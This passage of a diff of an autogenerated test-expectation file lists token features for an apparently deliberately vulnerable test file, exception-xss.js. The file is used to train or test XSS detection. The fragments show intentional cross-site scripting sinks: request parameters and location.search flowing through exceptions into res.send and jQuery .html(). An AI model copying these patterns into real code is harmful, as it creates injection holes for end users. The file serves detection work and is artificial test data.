autogenerated/Xss/ExceptionXss/exception-xss.js:119:7:119:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:7:119:10 | send | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:7:119:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:7:119:10 | send | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:24 | "Exception: " | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:24 | "Exception: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:24 | "Exception: " | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:24 | "Exception: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:24 | "Exception: " | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:24 | "Exception: " | stringConcatenatedWith | -endpoint- e | | autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:28 | "Exception: " + e | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:28 | "Exception: " + e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:28 | "Exception: " + e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19139,6 +129590,69 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:28 | "Exception: " + e | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:28 | "Exception: " + e | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:119:12:119:28 | "Exception: " + e | receiverName | res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:28:119:28 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:28:119:28 | e | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:28:119:28 | e | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:28:119:28 | e | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:28:119:28 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:28:119:28 | e | stringConcatenatedWith | 'Exception: ' -endpoint- | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:2 | (functi ... K\\n\\t}\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:2 | (functi ... K\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:2 | (functi ... K\\n\\t}\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:4 | (functi ... \\t}\\n})() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:4 | (functi ... \\t}\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:4 | (functi ... \\t}\\n})() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:4 | exceptional return of (functi ... \\t}\\n})() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:4 | exceptional return of (functi ... \\t}\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:1:132:4 | exceptional return of (functi ... \\t}\\n})() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:124:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:124:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:124:1 | this | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:124:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:124:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | 'arguments' object of anonymous function | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | exceptional return of anonymous function | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | functio ... OK\\n\\t}\\n} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | functio ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | functio ... OK\\n\\t}\\n} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | return of anonymous function | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:124:2:132:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:15 | sessionStorage | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:15 | sessionStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:15 | sessionStorage | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:15 | sessionStorage | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:15 | sessionStorage | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:23 | session ... setItem | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:23 | session ... setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:23 | session ... setItem | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:23 | session ... setItem | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:23 | session ... setItem | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | exceptional return of session ... search) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | exceptional return of session ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | exceptional return of session ... search) | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | exceptional return of session ... search) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | exceptional return of session ... search) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | session ... search) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | session ... search) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | session ... search) | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | session ... search) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:2:125:69 | session ... search) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:17:125:23 | setItem | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:17:125:23 | setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:17:125:23 | setItem | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:17:125:23 | setItem | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:17:125:23 | setItem | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:25:125:42 | 'exceptionSession' | CalleeFlexibleAccessPath | sessionStorage.setItem | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:25:125:42 | 'exceptionSession' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:25:125:42 | 'exceptionSession' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19147,6 +129661,16 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:125:25:125:42 | 'exceptionSession' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:25:125:42 | 'exceptionSession' | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:25:125:42 | 'exceptionSession' | receiverName | sessionStorage | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:52 | document | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:52 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:52 | document | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:52 | document | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:52 | document | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:61 | document.location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:61 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:61 | document.location | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:61 | document.location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:61 | document.location | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:68 | documen ... .search | CalleeFlexibleAccessPath | sessionStorage.setItem | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:68 | documen ... .search | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:68 | documen ... .search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19155,6 +129679,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:68 | documen ... .search | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:68 | documen ... .search | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:125:45:125:68 | documen ... .search | receiverName | sessionStorage | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:54:125:61 | location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:54:125:61 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:54:125:61 | location | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:54:125:61 | location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:54:125:61 | location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:63:125:68 | search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:63:125:68 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:63:125:68 | search | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:63:125:68 | search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:125:63:125:68 | search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:9 | unknown | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | exceptional return of unknown ... sion')) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | exceptional return of unknown ... sion')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | exceptional return of unknown ... sion')) | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | exceptional return of unknown ... sion')) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | exceptional return of unknown ... sion')) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | unknown ... sion')) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | unknown ... sion')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | unknown ... sion')) | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | unknown ... sion')) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:3:128:53 | unknown ... sion')) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:24 | sessionStorage | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:24 | sessionStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:24 | sessionStorage | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:24 | sessionStorage | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:24 | sessionStorage | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:32 | session ... getItem | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:32 | session ... getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:32 | session ... getItem | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:32 | session ... getItem | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:32 | session ... getItem | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | exceptional return of session ... ssion') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | exceptional return of session ... ssion') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | exceptional return of session ... ssion') | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | exceptional return of session ... ssion') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | exceptional return of session ... ssion') | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | session ... ssion') | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | session ... ssion') | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | session ... ssion') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19162,6 +129726,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | session ... ssion') | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | session ... ssion') | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:11:128:52 | session ... ssion') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:26:128:32 | getItem | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:26:128:32 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:26:128:32 | getItem | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:26:128:32 | getItem | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:128:26:128:32 | getItem | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:34:128:51 | 'exceptionSession' | CalleeFlexibleAccessPath | sessionStorage.getItem | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:34:128:51 | 'exceptionSession' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:34:128:51 | 'exceptionSession' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19170,6 +129739,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:128:34:128:51 | 'exceptionSession' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:34:128:51 | 'exceptionSession' | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:128:34:128:51 | 'exceptionSession' | receiverName | sessionStorage | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:129:11:129:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:3 | $ | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | $('myId') | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:16 | $('myId').html | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | $('myId').html(e) | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:3:130:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:5:130:10 